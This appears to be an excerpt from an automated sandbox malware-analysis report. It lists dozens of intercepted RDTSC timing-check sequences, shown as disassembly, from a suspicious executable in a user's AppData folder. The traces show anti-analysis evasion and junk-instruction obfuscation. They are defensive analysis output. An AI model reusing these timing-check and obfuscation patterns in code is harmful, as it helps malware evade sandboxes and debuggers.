                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A46D second address: 68A4AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 push ebx 0x00000008 jmp 00007F01B4D45EDFh 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007F01B4D45EDCh 0x00000019 jne 00007F01B4D45ED6h 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007F01B4D45ED6h 0x00000027 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A63F second address: 68A643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A643 second address: 68A669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F01B4D45EE5h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A7A8 second address: 68A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B44E8C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A931 second address: 68A955 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F01B4D45EE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F01B4D45ED6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A955 second address: 68A95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A95B second address: 68A962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A962 second address: 68A97F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B44E8CA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68AC4E second address: 68AC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F01B4D45ED6h 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68AC5A second address: 68AC73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68AC73 second address: 68AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F01B4D45EDEh 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68AC86 second address: 68AC8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68B086 second address: 68B0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F01B4D45EE0h 0x0000000a popad 0x0000000b jmp 00007F01B4D45EDAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F01B4D45EDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F01B4D45EE7h 0x00000021 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68B0D0 second address: 68B0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68B275 second address: 68B279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68B279 second address: 68B297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F01B44E8C96h 0x0000000d jmp 00007F01B44E8C9Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68D042 second address: 68D051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F01B4D45ED6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68D051 second address: 68D057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68D057 second address: 68D05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68D05B second address: 68D05F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68D05F second address: 68D076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EDEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68FCD0 second address: 68FCEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68FCEC second address: 68FD55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+124583A1h] 0x00000011 push 00000004h 0x00000013 call 00007F01B4D45EE3h 0x00000018 jmp 00007F01B4D45EE4h 0x0000001d pop edx 0x0000001e or edx, dword ptr [ebp+122D1E90h] 0x00000024 call 00007F01B4D45ED9h 0x00000029 jmp 00007F01B4D45EE5h 0x0000002e push eax 0x0000002f push ebx 0x00000030 jo 00007F01B4D45EDCh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68FF7F second address: 68FFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F01B44E8C9Eh 0x00000012 push dword ptr [ebp+12451E65h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F01B44E8C98h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push 6C4EBF16h 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 69317D second address: 693186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 693186 second address: 69318C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 69318C second address: 693190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 693190 second address: 6931C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA2h 0x00000007 jmp 00007F01B44E8CA9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 6931C3 second address: 6931C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 402CE0 second address: 402CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push edi 0x00000007 push esi 0x00000008 imul eax, eax, 001E7319h 0x0000000e add eax, 3CFB5543h 0x00000013 rcr eax, 10h 0x00000016 add eax, esi 0x00000018 imul eax, edi 0x0000001b xor edx, edx 0x0000001d mul dword ptr [ebp+08h] 0x00000020 mov eax, edx 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop ebx 0x00000025 leave 0x00000026 retn 0004h 0x00000029 lea eax, dword ptr [eax+00000300h] 0x0000002f push eax 0x00000030 push 00405BFCh 0x00000035 call 00007F01B44EA665h 0x0000003a push ebp 0x0000003b mov ebp, esp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 mov edi, dword ptr [ebp+08h] 0x00000043 push 000000FFh 0x00000048 call 00007F01B44E8F6Eh 0x0000004d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49307AA second address: 49307AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49307AE second address: 49307B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49307B2 second address: 49307B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493081A second address: 493082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8C9Ch 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493082A second address: 493082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930944 second address: 493094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493082E second address: 4930846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B4D45EDDh 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493094A second address: 4930950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930846 second address: 49308B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EE7h 0x00000009 jmp 00007F01B4D45EE3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F01B4D45EE8h 0x00000015 xor cx, EA58h 0x0000001a jmp 00007F01B4D45EDBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F01B4D45EE0h 0x0000002d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930167 second address: 493016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493016D second address: 4930173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930173 second address: 49301B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F01B4D45EE6h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F01B4D45EE7h 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49301B9 second address: 49301D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49301D1 second address: 4930257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e call 00007F01B4D45EE2h 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 call 00007F01B4D45EE7h 0x0000001b pop ecx 0x0000001c pop edx 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 mov cx, 19D1h 0x00000024 popad 0x00000025 call 00007F01B4D45ED9h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007F01B4D45EDFh 0x00000033 xor esi, 05A4C4BEh 0x00000039 jmp 00007F01B4D45EE9h 0x0000003e popfd 0x0000003f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930257 second address: 49302BE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F01B44E8CA0h 0x00000008 sbb eax, 71EB15B8h 0x0000000e jmp 00007F01B44E8C9Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 3007F9EFh 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F01B44E8CA5h 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F01B44E8C9Ah 0x0000002f or ax, 6F48h 0x00000034 jmp 00007F01B44E8C9Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49302BE second address: 493030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B4D45EE2h 0x00000008 pushfd 0x00000009 jmp 00007F01B4D45EE2h 0x0000000e or cx, 54D8h 0x00000013 jmp 00007F01B4D45EDBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F01B4D45EDBh 0x00000027 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493030B second address: 493030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493030F second address: 4930315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930315 second address: 4930336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930336 second address: 493033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493033D second address: 4930357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dh, B7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov cx, 2D61h 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bh, 83h 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930357 second address: 493035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493035D second address: 4930361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930361 second address: 4930365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930365 second address: 493037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8C9Bh 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493037B second address: 49303B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f push dword ptr [ebp+34h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edi 0x00000017 mov bx, 0FFCh 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49303B4 second address: 49303C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA1h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49303C9 second address: 49303CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49303CD second address: 493047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov edi, 6DF44F2Eh 0x00000011 pushfd 0x00000012 jmp 00007F01B44E8C9Fh 0x00000017 sub ch, FFFFFFDEh 0x0000001a jmp 00007F01B44E8CA9h 0x0000001f popfd 0x00000020 popad 0x00000021 push dword ptr [ebp+30h] 0x00000024 jmp 00007F01B44E8C9Eh 0x00000029 push dword ptr [ebp+2Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F01B44E8C9Eh 0x00000033 xor ecx, 7A15F708h 0x00000039 jmp 00007F01B44E8C9Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push dword ptr [ebp+28h] 0x00000043 pushad 0x00000044 pushad 0x00000045 mov edx, 22EB39E4h 0x0000004a call 00007F01B44E8C9Dh 0x0000004f pop eax 0x00000050 popad 0x00000051 mov esi, edi 0x00000053 popad 0x00000054 push dword ptr [ebp+24h] 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F01B44E8CA6h 0x0000005e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493047A second address: 4930505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EE1h 0x00000009 sbb esi, 5DD47236h 0x0000000f jmp 00007F01B4D45EE1h 0x00000014 popfd 0x00000015 mov cx, EA27h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+20h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F01B4D45EDFh 0x00000028 or ah, 0000006Eh 0x0000002b jmp 00007F01B4D45EE9h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F01B4D45EE0h 0x00000037 xor esi, 59FF02E8h 0x0000003d jmp 00007F01B4D45EDBh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930505 second address: 493051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493051D second address: 4930571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+1Ch] 0x0000000e pushad 0x0000000f call 00007F01B4D45EE4h 0x00000014 mov si, 32C1h 0x00000018 pop eax 0x00000019 mov edx, 30D7F6F2h 0x0000001e popad 0x0000001f push dword ptr [ebp+18h] 0x00000022 pushad 0x00000023 jmp 00007F01B4D45EDFh 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c push dword ptr [ebp+14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930571 second address: 4930575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930575 second address: 493058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 493058C second address: 49305B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edx, ecx 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305C7 second address: 49305CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305CB second address: 49305D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305D1 second address: 49305E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDCh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305E1 second address: 49305E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305E5 second address: 49305FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B4D45EDAh 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49305FA second address: 4930600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4930600 second address: 4930604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49002A6 second address: 49002BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49002BC second address: 49002C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49002C0 second address: 49002DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
